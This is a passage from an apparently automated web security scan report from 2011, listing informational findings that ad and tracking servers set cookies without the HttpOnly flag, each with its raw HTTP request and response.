09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db41880; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 24 Apr 2011 12:33:03 GMT
Connection: close


18.248. http://cmi.netseer.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:09:57 GMT
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,...........D.;

18.249. http://cmi.netseer.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /redirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redirect?ex=10&t=1303614597199 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 03:09:55 GMT
Location: http://cm.g.doubleclick.net/pixel?nid=netseer1
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 0
Connection: keep-alive


18.250. https://crm.infusionsoft.com/go/infs/footer_psr/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://crm.infusionsoft.com
Path:   /go/infs/footer_psr/web

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/infs/footer_psr/web HTTP/1.1
Host: crm.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/AddForms/processFormSecure.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: affiliate=footer_psr; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: src=web; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: contactId=0; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: jumpLog=6315978; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Set-Cookie: linkedJumpLog=""; Expires=Wed, 01-Jan-2025 01:06:39 GMT; Path=/
Location: http://infusionsoft.com
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Mon, 25 Apr 2011 01:06:39 GMT


18.251. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fkrypt.com%2fdedicated%2f HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh09ikd00634010h06406; rdrlst=4020znmlk346200000001340110poljyxb4000000033401; sglst=2020s0t7ljyxb4046uy00334010h03403ag3ljyxb4046uy00334010h03403; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0cf4q00736010i01407; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40315xylk60qf0000000136010znmlk346200000002360110poljyxb4000000043601; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb4073fb00436010i01404ag3ljyxb4073fb00436010i01404; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTEwMzkmdGw9NDMyMDA=&piggybackCookie=xrd52zkwjuxh
Content-Length: 0
Date: Sun, 24 Apr 2011 16:35:03 GMT


18.252. http://ctix8.cheaptickets.com/dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 24 Apr 2011 12:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&WT.Site=www.hotelclub.com&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Book%20Cheap%20Hotel%20Deals,%20Budget%20%26%20Luxury%20Accommodation%20|%20HotelClub&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-2165807168.30147192&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=173.193.214.243-2165807168.30147192.1303646990479&hostname=www.hotelclub.com&owwPage=/&pos=HCLC&LNG=en_AU&avid=1129876971252011042422094&dcsdat=1303646990460&dcssip=www.hotelclub.com&dcsuri=/
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMTY1ODA3MTY4LjMwMTQ3MTkyAAAAAAABAAAAbgIBAAsTtE0LE7RNAQAAABQuAAALE7RNCxO0TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


18.253. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Fri, 21-Oct-2011 19:44:39 GMT; Path=/
Content-Type: text/javascript
Content-Length: 150
Date: Sun, 24 Apr 2011 19:44:39 GMT

new Image().src="http://r.turn.com/r/beacon?b2=BUZnutw2qFUI7sBlwdc9kXSUS8P8yUumiPyYOI98PvhYO1UR3WDfKVsb3GrekZXMJ-VfmV87kwAEvRy0NRYXyQ&cid=&bprice=";


18.254. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 22-Oct-2011 00:34:42 GMT; Path=/
Location: http://r.turn.com/r/beacon?b2=k-hABjwaz4vY_SYSODGI74jjjFhp9GU93kn7m8IpuKlYO1UR3WDfKVsb3GrekZXMu49Bz098v7GwzMMsUVOvCg&cid=&bprice=
Content-Length: 0
Date: Mon, 25 Apr 2011 00:34:41 GMT


18.255. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Fri, 21-Oct-2011 19:44:39 GMT; Path=/
Location: http://r.turn.com/r/beacon?b2=AYQ_0CdLCQsxFOFa2_kItqH2QV_AenG_sXoZjNYK-KtYO1UR3WDfKVsb3GrekZXMJmc0Saq2SB7f4Qt_mnTrKA&cid=&bprice=
Content-Length: 0
Date: Sun, 24 Apr 2011 19:44:39 GMT


18.256. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d.audienceiq.com
Cookie: uid=7227032295465204149

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7227032295465204149; Domain=.audienceiq.com; Expires=Sat, 22-Oct-2011 00:52:46 GMT; Path=/
Location: http://r.turn.com/r/beacon?b2=doruVzYOl1-XNYz023NiC7C5GQgewb8E-kOIojWkcztYO1UR3WDfKVsb3GrekZXMcNjKQffycmYvO8MyJ_088g&cid=&bprice=
Content-Length: 0
Date: Mon, 25 Apr 2011 00:52:45 GMT


18.257. http://d.w55c.net/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=768&cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw HTTP/1.1
Host: d.w55c.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=1afbb964a14b8098516b6fdbef7997dd; expires=Mon, 23-Apr-2012 15:19:39 GMT; path=/
Content-Length: 4729
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

18.258. http://d.w55c.net/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=750&campaignid=74&zoneid=768&loc=http%3A%2F%2Fcdn.w55c.net%2Fi%2F0RuFuATqDZ_452086828.html%3Frtbhost%3Drts-rr13.sldc.dataxu.net%26btid%3DNERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw%26ei%3DGOOGLE_CONTENTNETWORK%26wp_exchange%3DTbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ%26euid%3DQ0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn%26slotid%3DMQ%26fiu%3DMEZwU0VZRzVFdQ%26ciu%3DMFJ1RnVBVHFEWg%26reqid%3DNERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc%26ccw%3DSUFCMSMwLjB8SUFCOCMwLjA%26bp%3D850%26zc%3DNzUyMDc%26v%3D0%26s%3Dhttp%253A%252F%252F%26&cb=720d373981&r_id=7ce2cef5935485e65f12ca557cd4ba2a&r_ts=lk5x8r HTTP/1.1
Host: d.w55c.net
Proxy-Connection: keep-alive
Referer: http://d.w55c.net/afr.php?zoneid=768&cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; OAID=b582f801d16249d1434773906a4b7fd4

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=b582f801d16249d1434773906a4b7fd4; expires=Mon, 23-Apr-2012 15:19:40 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

18.259. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=9&q=&$=&s=123&z=0.3447061919141561 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
